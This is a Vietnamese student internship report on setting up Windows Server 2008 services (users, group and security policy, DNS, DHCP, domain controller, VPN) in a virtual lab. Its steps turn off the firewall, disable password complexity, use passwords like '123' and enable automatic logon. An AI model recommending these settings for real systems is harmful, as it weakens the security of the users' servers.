Download - Báo Cáo Cuối Khóa
Trung Tâm Đào Tạo Quản Trị Mạng Và An Ninh Mạng Quốc Tế Athena
BÁO CÁO THỰC TẬP CUỐI KHÓA
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
GVHD: Võ Đỗ Thắng
Sinh viên thục hiện:
- Lý Ngọc Diệp- Phạm Thị Diễm Kiều- Nguyễn Thị Tuyết
TP. Hồ Chí Minh, ngày 5 tháng 5 năm 2014
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
LỜI MỞ ĐẦUNgày nay với sự phát triển của khoa học kỹ thuật thì máy tính trở
nên phổ biến với mọi người. Chúng mang lại cho con người khả năng to lớn và làm những công việc phi thường: tính toán nhanh và chính xác các bài toán phức tạp, điều khiển tự động, giải trí… Máy tính ra đời không chỉ hỗ trợ trong sản xuất mà còn trong việc học tập và làm góp phần giải phóng sức lao động. Máy tính điện tử là một phát minh, thành tựu to lớn cho sự phát triển của nhân loại góp phần thúc đẩy mạnh mẽ tiến bộ khoa học và kỹ thuật nói riêng cũng như nhân loại nói chung.
Bên cạnh sự phát triển chóng mặt của máy tính trong thời buổi công nghệ thông tin thì các ứng dụng, dịch vụ mạng là nền tản không thể tách rời. Sức mạnh máy tính có thể nhân lên gấp nhiều lần khi được kết nối thành mạng máy tính. Là cơ sở hạ tần cho phép trao đổi thông tin, truyền tải dữ liệu từ xa nhằm rút ngắn khoảng cách. Với mạng máy tính toàn cầu chúng ta dễ dàng tiếp cận với sự phát triển của thế giới trong đó có sự phát triển gần nhất của Windows Server là Windows Server 2000 và Windows Server 2003 và tiếp đến là Windows Server 2008 hỗ trợ tốt các dịch vụ mạng cần thiết trên Server, việc cải tiến không ngừng giúp nâng cao tính ổn định và an toàn hơn cho Windows Server 2008 hoạt động một cách trơn tru.
Hiện nay quá trình công nghiệp hóa hiện đại hóa đất nước là một chủ trương hàng đầu của nhà nước. Mạng máy tính trở thành mục tiêu nghiên cứu và phát triển. Cốt lõi là ngành công nghệ thông tin bao gồm nhiều lĩnh vực từ kiến trúc mạng đến nguyên lý thiết kế, cài đặt mô hình ứng dụng v.v… Mạng viễn thông nói chung và mạng máy tính trên nền tảng Windows Server 2008 nói riêng là công cụ hũu dụng không thể thiếu trong bộ máy nhà nước, trường học, doanh nghiệp… Nó đóng vai trò cầu nối trao đổi thông tin giữa các chính phủ, tổ chức xã hội và mọi người với nhau.
Qua thời gian học tập và nghiên cứu trên ghế nhà trường cùng với sự hỗ trợ tận tình của Thầy cô, bạn bè và người thân đã giúp em thu thập được nhiều kiến thức quý báo. Đặc biệt là quá trình thực tập tại Trung tâm ATHENA giúp em có những trải nghiệm vô cùng thú vị và bổ ích. Với mong muốn tìm hiểu về mạng máy tính và góp phần xây dựng một mạng máy tính thân thiện, thông minh cho mọi người sử dụng.
Tuy đã có nhiều cố gắng song không thể tránh những khuyết điểm, sai sót vì thế mong được sự thông cảm và những ý kiến đóng góp quý báo từ Quý Thầy Cô, bạn bè, bạn đọc, để em có thể ngày một hoàn thiện đề tài của mình hơn. Xin chân thành cảm ơn.
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
LỜI CẢM ƠN
Thực tập là quá trình tham gia học hỏi, so sánh, nghiên cứu và ứng dụng những kiến thức đã học vào thực tế công việc ở các cơ quan quản lý hành chính nhà nước và các công việc sau này. Với nhiều kiến thức còn bỡ ngỡ của một sinh viên năm cuối ,chuyên ngành công nghệ thông tin trường Đại học Tài Nguyên Và Môi Trường TPHCM ,tôi đã được tham gia trong suốt quá trình thực tập tại trung tâm Athena. Tại đây chúng tôi đã nhận được nhiều sự hỗ trợ và giúp đỡ của các bạn bè đồng nghiệp và đặc biệt là sự tận tình, chu đáo của thầy Võ Đỗ Thắng, giám đốc Trung tâm đào tạo và quản trị mạng an ninh quốc tế. Cùng với sự hỗ trợ từ phía nhà trường, xin gởi lời cảm ơn chân thành đến quý thầy cô khoa công nghệ thông tin trường Đại học Tài Nguyên Và Môi Trường TPHCM đã tạo điều kiện tốt nhất để chúng tôi hoàn thành khóa thực tập này.
Với sự nỗ lực của bản thân và sự hỗ trợ giúp đỡ, kiến thức ban đầu vẫn còn nhiều hạn chế, vì vậy không tránh khỏi những thiếu sót trong quá trình hoàn thành báo cáo. Mong nhận được nhiều đóng góp ý kiến của quý thầy cô cũng như nhiều bạn cùng chuyên môn để có thể nắm vững kiến thức hơn.
Sau cùng, chúng tôi xin kính chúc quý Thầy Cô trong Khoa Công Nghệ Thông Tin và Thầy Võ Đỗ Thắng lời chúc sức khỏe, niềm tin để tiếp tục thực hiện sứ mệnh cao đẹp của mình_ truyền đạt kiến thức cho thế hệ mai sau.
Trân trọng.
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
NHẬN XÉT CỦA GV...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Mục LụcCHƯƠNG 1: TỔNG QUAN............................................................................................3
1.1 Giới thiệu về cơ quan thực tập...............................................................................3
1.1.1 Trụ sở và các chi nhánh Trụ sở chính.............................................................1
1.1.2 Cơ cấu tổ chức................................................................................................1
1.1.3 Cơ sở vật chất.................................................................................................2
1.1.4 Vấn đề cần giải quyết.....................................................................................3
CHƯƠNG 2: KIẾN THỨC CƠ SỞ..................................................................................3
2.1 Lý thuyết.................................................................................................................3
CHƯƠNG 3: PHƯƠNG PHÁP THỰC HIỆN VÀ KẾT QUẢ........................................4
3.1 Phương pháp nghiên cứu........................................................................................4
CHƯƠNG 4: CHI TIẾT KẾT QUẢ.................................................................................4
4.1 LOCAL USER AND GROUP................................................................................4
4.2 Local Policy.........................................................................................................11
4.3 Local Security policy...........................................................................................22
4.4 DNS......................................................................................................................34
4.5 DHCP...................................................................................................................40
4.6 Domain.................................................................................................................46
4.7 VPN.......................................................................................................................55
4.8 IIS.........................................................................................................................70
4.9 Mail Server...........................................................................................................79
4.10 Khai thác mã lỗi MS10_042..............................................................................93
4.11 Mail Server trên VPS.......................................................................................100
4.12 WINDOWS SERVER BACKUP....................................................................117
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
CHƯƠNG 1: TỔNG QUAN1.1 Giới thiệu về cơ quan thực tập
Giới thiệu công tyTrung tâm Đào Tạo Quản Trị Mạng và An ninh Mạng Quốc Tế
ATHENA_ Tiền thân là Công ty TNHH Tư vấn và Đào tạo quản trị mạng Việt Năng, (tên thương hiệu viết tắt là TRUNG TÂM ĐÀO TẠO ATHENA), được chính thức thành lập theo giấy phép kinh doanh số 4104006757 của Sở Kế Hoạch Đầu Tư Tp Hồ Chí Minh cấp ngày 04
tháng 11 năm 2008.
Tên công ty viết bằng tiếng nước ngoài: ATHENA ADVICE TRANINGNETWORK SECURITY COMPANY LIMITED ATHENA.
Là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt huyết và kinh nghiệm trong lĩnh vực công nghệ thong tin. Với quyết tâm góp phần vào công cuộc đẩy tiến trình tin học hóa của nước nhà ATHENA đã và đang tập trung chủ yếu vào các hoạt động sau:
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Công tác huấn luyện , quảng bá kiến thức tin học, đặc biệt trong lĩnh vực mạng máy tính, internet, bảo mật và thương mại điện tử…
Tư vấn và hỗ trợ cho doanh nghiệp ứng dụng hiệu quả tin học vào hoạt động sản xuất kinh doanh.
Cung cấp nguồn nhân lực trong lĩnh vực công nghệ thông tin, đặc biệt là chuyên gia về mạng máy tính và bảo mật mạng đạt trình độ quốc tế cho các tổ chức, doanh nghiệp có nhu cầu.
Tiến hành các hoạt động nghiên cứu nâng cao kiến thức tin học và phát triển cơ sở dữ liệu thong tin về các ứng dụng và sự cố mạng.
Tiến hành các dịch vụ ứng cứu khẩn cấp cho doanh nghiệp trong trường hợp xảy ra sự cố máy tính.1.1.1 Trụ sở và các chi nhánh Trụ sở chính
Trụ sở chính _Trung Tâm Đào Tạo Quản Trị Mạng Và An Ninh Mạng Quốc Tế ATHENA .
Số 2 Bis Đinh Tiên Hoàng , phường Đa Kao, Tp Hồ Chí Minh , Việt Nam.
Website :www.athena.com.vnĐiện thoại: (84-8) 38244041Hotline : 0943 23 00 99Cơ sở 2_Trung Tâm Đào Tạo Quản Trị Mạng Và An Ninh Mạng
Quốc Tế ATHENA92 Nguyễn Đình Chiểu, phường Đa Kao, Quận 1, Tp Hồ Chí Minh,
Việt Nam.Website :www.Athena.Edu.VnĐiện thoại: (84-8) 2210 3801Hotline : 0943 111 692 Chi nhánh Nha Trang+ Điện thoại: 08 3824 4041 + Fax: 08 39 111 692+Website: www.athena.edu.vn+Email: [email protected]
1.1.2 Cơ cấu tổ chứcSơ đồ cơ cấu tổ chứcHình 1.Sơ đồ tổ chức công ty
Cơ cấu tổ chứcSơ đồ cơ cấu tổ chứcHình 1.Sơ đồ tổ chức công ty
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Sau gần 10 năm hoạt động , nhiều học viên tốt nghiệp trung tâm ATHENA đã là chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều bộ ngành như Cục Công Nghệ Thông Tin – Bộ Quốc Phòng, Bộ Công An, Sở Thông Tin Truyền Thông các tỉnh, bưu điện các tỉnh,…
Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều chương trình hợp tác và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành Phố Hồ CHính Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự ,......1.1.3 Cơ sở vật chất Thiết bị đày đủ và hiện đạiChương trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những công nghệ mới nhất.Phòng máy rộng rãi, thoáng mát.Giới thiệu về nội dung công việc được giao thực tậpNội dung cần giải quyết
- Cài đặt windows server 2008- Nâng cấp Stand Alone thành Domain controller- Cài đặt windows xp- Join Domain cho windows xp
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
- Cài đặt và cấu hình DNS và DHCP- Tạo user account trên AD, thiết lập Policy cho phép user có quyền thay
đổi giờ hệ thống.- Dựng hệ thống Multi Master cho Domain controller- Backup cho Domain controller- Tìm lỗ hổng của hệ thống
1.1.4 Vấn đề cần giải quyếtVấn đề đặt ra vẫn cón nhiều khó khăn.Chủ đề đã được nhiều người
thực hiện rất tốt.Chính vì thế, cũng đã gây nhiều áp lực khi thực hiện chủ đề này.
Yêu cầu đặt ra phải được thực hiện rõ ràng, các máy ảo phải được thực hiện đầy đủ. Các bước thực hiện phải được ghi lại một cách chi tiết.
Phạm vi của đề tàiVấn đề đặt ra vẫn còn nhiều khó khăn.Chủ đề đã nhiều người thực
hiện rất tốt. Chính vì thế đã gây nhiều áp lực khi thực hiện,đòi hỏi nhiều chuyên sâu hơn
Yêu cầu đặt ra phải được thực hiện rõ rang,các máy ảo phải được thực hiện đầy đủ. Các bước thực hiện phải được ghi lại một cách chi tiết
Các bước đã làm được+ Cài đặt windows server 2008+ Nâng cấp Stand Alone thành Domain controller+ Cài đặt windows xp+ Join Domain cho windows xp+ Cài đặt và cấu hình DNS và DHCP+ Tạo user account trên AD, thiết lập Policy
CHƯƠNG 2: KIẾN THỨC CƠ SỞ2.1 Lý thuyết
Hoạt động mạng máy tính, vận hành hệ thống mạng, giải quyết sự cố mạng và nắm được các phương pháp để bảo vệ mạng trước trước nguy cơ virus, worm, trojan, spam. Cũng như các biện pháp chống xâm nhập, ăn cắp thông tin, phá hoại mạng.
Công việc cần thực hiện chính là nắm được các bước và cách làm để thực hiện quản trị cách tốt nhất.Biết cách cài đặt máy chủ và client, tìm hiểu nhiều tài liệu để biết quản trị các hoạt Nắm vững các bước thực hiện trong quản trị Windows server 2003.
Có khả năng tự thiết lập một mạng máy tính, cấu hình mạng, điều chỉnh năng hoạt động của mạng.
Kỹ thuậtHoạch định và chuẩn bị đầy đủ là yếu tố quan trọng quyết định quá
trình cài đặt có thuận lợi hay không.Trước khi cài đặt, bạn phải biết
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
được những gì cần có để có thể cài đặt thành công và bạn có được tất cả thông tin cần thiết để cung cấp cho quá trình cài đặt. Để lên kế hoạch cho việc nâng cấp hoặc cài đặt mới các Server nên tham khảo các hướng dẫn từ Microsoft Windows Server 2008. Các thông tin biết trước khi nâng cấp hoặc cài mới hệ điều hành:
Phần cứng đáp ứng được yêu cầu của Windows Server 2008.Làm sao để biết được phần cứng của hệ thống có được Windows
Server 2008 có hỗ trợ hay khôngĐiểm khác biệt giữa cài đặt mới và nâng cấp (upgrade).Những lựa chọn cài đặt nào thích hợp với hệ thống của bạn, chẳng
hạn chiến lược chia partition đĩa, và bạn sẽ sử dụng hệ thống tập tin nào…
Còn nhiều yêu cầu kĩ thuật sẽ nói trong chương 4CHƯƠNG 3: PHƯƠNG PHÁP THỰC HIỆN VÀ KẾT QUẢ3.1 Phương pháp nghiên cứu- Phương pháp nghiên cứu chính là tìm hiểu các tài liệu, làm theo yêu cầu của đơn vị thực tập, được hướng dẫn chi tiết cách thức thực hiện.-Xác định rõ ràng công việc cần thực hiện- Sắp xếp lịch để thực hiện-Cần chuẩn bị những gì để đáp ứng yêu cầu mà đề tài nghiên cứu đã đặt ra.-Cài đặt máy thích hợp để thực hiện -Chuẩn bị phần cứng , ổ đĩa để đáp ứng cho việc nghiên cứu-Mô tả chi tiết-Kết quả chính là các demo chạy chương trình và các bước thực hành, được quay lại bằng video, sẽ được trình bày cụ thể tại chương 4.CHƯƠNG 4: CHI TIẾT KẾT QUẢ4.1 LOCAL USER AND GROUPChuẩn bị: - Máy Window Sever 2008(chưa năng cấp Domain ) Sever 1NIC:192.168.1.1/24-Máy Window XP:PC1NIC 1:192.168.1.2/24
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Mô hình
Mục Tiêu bài LAB:
- Tạo local user and group trên máy sever 1
- Mục tiêu cuối cùng:các user có thể đăng nhập vào máy sever 1
LƯU Ý:-Khi thực hiện trên máy ảo VM-WARE các car mạng sẽ được thiết lập ở chế độ HOST ONLY-Nên tắt tính năng window Firewall trên các máy sever và PCThực hiện:
- Bước 1( Tạo local user)
Trên máy sever,vào start chọn run rồi gõ lusrmgr.msc để vào local use and groups:
Trong Local uer and groups,chuột phải vào User chọn New tạo 2 User U1 và U2 với pass là 123abc!!!
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Tương tự đối với u2
- Bước 2( Đăng nhập User vừa tạo trên Sever 1)
Đăng nhập vào Sever 1 bằng U 1:
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Trong U1,có thể truy cập vào Profile chủa chính mình nhưng không thể truy cập vào Profile của User khác
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
- Bước 3( Tạo Local Group và add User vào Group đó)
Trên máy Sever 1,vào start chọn run rồi gõ lusrmgr.msc để vào Local Group and User Group
Trong Local Group and User Group,chuột phải vào Group chọn New Group tạo 2 Group ketoan,nhansu rồi chọn Add để thêm U1 vào Group ketoan và U2 vaog Group nhansu
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
- Bước 4 Cấu hình cho phép User u1 tự động đăng nhập vào Sever 1 khi khởi động:
Trên máy Sever1,vào Start chọn run gồi gõ UserPassword2 để vào Users Accounts
Trong Users Accounts,bỏ check ở phần Users must enter a user name pasword to use this computer rồi chọn Apply
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Sau đó nhập tên User và password muốn đăng nhập tự động vào sever1:
Chọn ok ok , sau đó Retstart máy để kiểm tra kết quả 4.2 Local PolicyChuẩn bị:
- Máy Window Sever 2008(chưa năng cấp Domain ) Sever 1NIC:192.168.1.1/24-Máy Window XP:PC1NIC 1:192.168.1.2/24
Mô hình:
Mục tiêu bài LAB: Tạo local policy trên máy Sever1 để áp dụng lên từng đối tượng
khác nhauMục tiêu cuối cùng:áp dụng các chính sách cho các đối tượng khác
nhau
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Lưu ý:Khi thực hiện trên máy ảo VM-WARE các car mạng sẽ được thiết lập ở chế độ HOST ONLYNên tắt tính năng window Firewall trên các máy sever và PC
- Bước 1: Tạo Group Policy Console cho u2, Administrator, Non -AdministratorTrên máy Sever1,vào Strart chọn run rồi gõ ccm để vào Console1[Console Root]
Trong Console1[Console Root],chọ File-> Add/Remove Snap-ins
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Trong Add/Remove Snap-ins,chọn Group Policy Object rồi chọ Add
Trong Select Group Policy Object,chọn Browes.
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Trong Browes for a Group Policy Object rồi chọn sang tab Users để chọn U2:
Thực hiện tương tự đẻ cho group Administrator và Non- Administrator
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Sauk hi tạo xong U2, Administrator và Non- Administrator,ta sẽ vào file rồi chon Save để lưu lại Console này
- Bước 2: Tạo Group Policy để tắt Shutdow Event Trackker trên Sever1 cho Administrators
Chọn Start-> Run rồi gõ gpedit.msc để vào Local Group Policy Editor
Trong Local Group Policy Editor,chọn Computer Comfiguration->Administrative Templates-> System chọn Dislay Shutdow Event
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Tracker
Trong Dislay Shutdow Event Tracker Properties,check vào Disabled:
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Để update Group policy vừa cấu hình,ta vào Start->run gõ cmd. Sau đó gõ lệnh gpupdate/force:
Test thành công Group Policy vừa tạo:
- Bước 3: Tạo Group Policy không cho Group Non-Administrators truy cập Control Panel
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Trên máy Sver,mở lại Group Policy Cosole đã tạo khi nãy rồi chọn Non-Administrators Policy
Trong Non-Administrators policy,chọn Use Configuration->Administrative Templates->Control Panel chọn Prohibit access to the
Contro Panel:
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Trong Prohibit access to the Control Panel Properties,chọn Enabled:
Để update group policy vừa cấu hình,ta vào Start->Run gõ cmd.Sau đó gõ lệnh gpupdate/force:
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Test Group Policy vừa tạo bằng cách đăng nhập vào u1 và u3 để kiểm tra sẽ không thấy Control Panel:
- Bước 4( Cấu hình group policy không hiển thị Recycle Bin khi User u2 đăng nhập Sever1)
Trên máy Sever1,mở lại Group Policy Console đã tạo khi nảy rồi chọn U2 policy
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Trong U2 Policy,chọn User Configuration->Administrative Templates->Desktop rồi chọn Remove Recycle Bin icon from desktop:
Trong Remove Recyde Bin icon from desktop properties chọn Enabled:
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Để update group policy vừa cấu hình, ta vào start->run gõ cmd. Sau đó gõ lệnh gpupdate/force:
Test Group policy vừa tạo bằng cách đăng nhập vào U2 để kiểm tra sẽ không thấy icon Recycle Bin
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
4.3 Local Security policyChuẩn bị:
- Máy Window Sever 2008(chưa năng cấp Domain ) Sever 1
NIC:192.168.1.1/24
- Máy Window XP:PC1
NIC 1:192.168.1.2/24Mô hình:
Mục Tiêu bài LAB:
- Tạo local Security Policy trên máy Sever1 để áp dụng chính sách cho các User
- Mục tiêu cuối cùng: Áp dụng được các chính sách an ninh cho các user
Lưu ý
- Khi thực hiện trên máy ảo VM-WARE các car mạng sẽ được thiết lập ở chế độ HOST ONLY
- Nên tắt tính năng window Firewall trên các máy sever và PC
Thực hiện- Bước 1: Cho Phép tạo User với password đơn giảnTrên máy Sever1,vào Start chon Run rồi gõ lusrmgr.msc để vào Local Users and Groups:
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Trong Local User And Group, tạo mới User U1,với password đơn giản là 123 sẽ báo lỗi là pasword không đủ độ phức tạp
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Trên máy Sever 1, vào Start chọn Run rồi gõ secpol.msc để vào Local Security Policy
Trong Local Security Policy,chọn Account -> Passwword Policy->Password must meet complexity requirements:
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Trong Password must meet complexity requirements,chọn Disable,sau đó Apply rồi ok
Để update security policy vừa cấu hình, ta vào Start->Run gõ gpupdate /force rồi Enter.
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Test Security policy vừa tạo bằng cách tạo lại User lest1 với passwords đơn giản là 123
- Bước 2: Tạo 1 Security Policy khóa 1 User nếu đăng nhập vào sever1 sai 3 lần
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Trong Local Security Policy, chọn Account Policies-> Account Lockout Policy,tiếp theo ta sẽ cấu hình 3 mục là:Account lockout duration,Account lockout threshold và Reset account lockout counter after
Trong Account lockout duration Properties( quy định thời gian khóa user đăng nhập sai 3 lân),gõ số phút mà bạn muốn xóa user vào phần Account is locked out for:
Trong Reset account lockout counter after ( quy định thời gian reset user đã bị khóa vào phần Reset account lock out counter after)
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Trong Reset account lockout counter after ( quy định thời gian reset user đã bị khóa do đăng nhập sai 3 lần),gõ số phút mà bạn muốn reset user bị khóa vào phần Reset account lock out counter after:
Để update security policy vừa cấu hình, ta vào Start->Run gõ gpupdate/force rồi Enter
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Test security vừa tạo bằng cách đăng nhập 1 User sai quá 3 lần và
đây là thông báo lỗi của User lest1
Trong Local User and Group của Administrator,ta sẽ thấy lest1 bị khóa như sau
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
- Bước 3:( Tạo Security Policy cho phép tất cả các User đều có quyền tắt máy)
Đầu tiên ta đăng nhập user1 sẽ không thấy quyền tắt máy
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Trên máy sever1 vào Start chọn Run rồi gõ secpol.msc để vào local Security Policy
Trong Local Security Policy, chọn Local Policies->User Rights Assignment->Shutdown the systen
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Trong Shutdown the system Properties, chọn Add User or Group và ở ô Enter the object names to select ta gõ Everyone rồi OK-> OK
Để update security policy vừa cấu hình, ta vào Start->Run gõ gpupdate /force rồi Enter.
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Test security policy vừa tạo bằng cách đăng nhập vào 1 user bất kì để kiểm tra quyền tắt máy:
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
4.4 DNS Dịch vụ này giúp các bạn tạo nhiều Trang web chạy cùng một cổng (80). Đồng thời cung cấp khả năng truy cập các trang Web bằng tên miền thay cho IP.
- Bước 1: Cài đặt dịch vụ DNS
Start menu > Administrative tools > Server Manager
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Chọn DNS Server > Next > Next > Install
- Bước 2: Cấu hình DSN Zones và kiểm tra
Start menu > Administrative Tools > DSN
R-Click Forward Lookup Zone > New Zone…
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Click Next
Chọn Primary zone > Next
Click Next
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Click Next
Click Next
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Click Finish
- Bước 3: Cấu hình Zone
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
R-Click Zone: athena.edu.vn > New Host (A or AAAA)…
Name: Để trống IP address: 192.168.1.1 (IP của máy đang chạy IIS) Ta sẽ kiểm tra bằng cách trên máy sever1 vào Start chọn run gõ cmd
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Trên máy Xp ta cũng kiểm tra tương tự
4.5 DHCPChuẩn bị: - Máy Windows Server 2008: Server 1 NIC 1: 192.168.1.1/24 - Máy Windows XP: PC 1 NIC 1: IP nhận động Mô hình:
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Mục tiêu: - Xây dựng máy chủ dịch vụ cấp phát địa chỉ IP động cho các máy
trong mạng LAN. Lưu ý:
- Nếu thực hiện trên VW-Ware thì phải tắt tính năng DHCP trong mục Virtual Network Editor. - Trong cùng một hệ thống, chỉ sử dụng một DHCP - Server để cấp phát IP.
Thực hiện:
- Bước 1: Cài đặt dịch vụ DHCP trong Server Roles.
Start Menu > Adminsitrative tools > Server Manager
Click Add Roles.
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Click chọn DHCP Server > Next
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Chọn chính xác card mạng mà ta muốn cấp phát IP thông qua nó! > Next
Thông tin Domain, Primary DNS, Altenate DNS. Ví dụ: Domain Athena.edu.vn, DNS: 192.168.1.1 > Next
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
DHCP Scopes > Click Add Scope
Điền thông tin Scope. > OK > Next
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
IP version 6: Disable > Next > Install > CloseBước 2: Kiểm tra IP được cấp trên máy Windows XP
IP đã nhận chính xác từ DHCP - Server
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
4.6 DomainChuẩn bị: - Máy Windows Server 2008 (chưa nâng cấp Domain) NIC 1: 192.168.1.1/24 - Máy Windows XP: PC 1 NIC 1: 192.168.1.2/24
Mục tiêu bài LAB: - Cài Domain Controller trên máy server1 và tiến hành join PC1 vào
domain và đăng nhập Domain Administrator để sử dụng Administrative Tools cho máy
PC1. - Mục tiêu cuối cùng: cài đặt Domain Controller và join PC1 vào
domain thành công. Lưu ý:
- Khi thực hiện trên máy ảo VM-ware, các card mạng sẽ thiết lập ở chế độ HOST ONLY,
- Nên tắt tính năng Windows Firewall trên các máy Server và PC.
Thực Hiện:
- Bước 1: cài đặt Domain Controller trên máy server1:
Trên máy server1, cấu hình Preferred DNS server trên card mạng trỏ về máy server1(192.168.1.1):
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Vào Start -> Run gõ dcpromo để nâng cấp Domain Controller cho máy server1:
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Trong cửa sổ Welcome to the Active Directory Domain Services Installation Wizard, ta để mặc định rồi chọn Next:
Trong cửa sổ Operating System Compatibility, ta để mặc định rồi chọn Next:
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Trong cửa sổ Choose a Deloyment Configuration, ta chọn Create a new domain in a new forest rồi chọn Next:
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Trong cửa sổ Name the Forest Root Domain, trong phần FQDN of the forest root domain, ta gõ tên domain muốn đặt cho domain mới rồi chọn Next:
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Trong cửa sổ Set Forest Functional Level, tùy theo hệ thống của bạn đang sử dụng thế hệ
windows server nào mà ta chọn cho phù hợp ở phần Forest functional level rồi chọn Next:
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Trong cửa sổ Additional Domain Controller Options, ta chọn Next. Sau đó trong phần Active Directory Domain Services Installation Wizard, ta chọn Yes:
Trong cửa sổ Location for Database, log Files, and SYSVOL, ta chọn Next để tiếp tục quá trình cài đặt:
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Trong cửa sổ Directory Services Restore Mode Administrator Password, ta gõ password muốn sử dụng để quản trị domain này vào ô Password & Confirm password rồi chọn Next:
Trong cửa sổ Summary, ta chọn Next:
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
Sau đó, ta check vào tùy chọn Reboot on completion để hệ thống tự động restart sau khi hoàn thành quá trình nâng cấp Domain Controller
Đề Tài: Nghiên cứu và triển khai các dịch vụ trên Windows Server 2008
4.7 VPNVPN - Client to SiteChuẩn bị: - Máy Windows Server 2008: Server 1 NIC 1: 192.168.1.1/24 (NAT) NIC 2: 10.0.0.1/8 (Host Only) - Máy Windows XP: PC 1 NIC 1: 192.168.1.2/24 (NAT) - Máy Windows XP: PC 2 NIC 1: 10.0.0.2/8 (Host only) Mô hình:
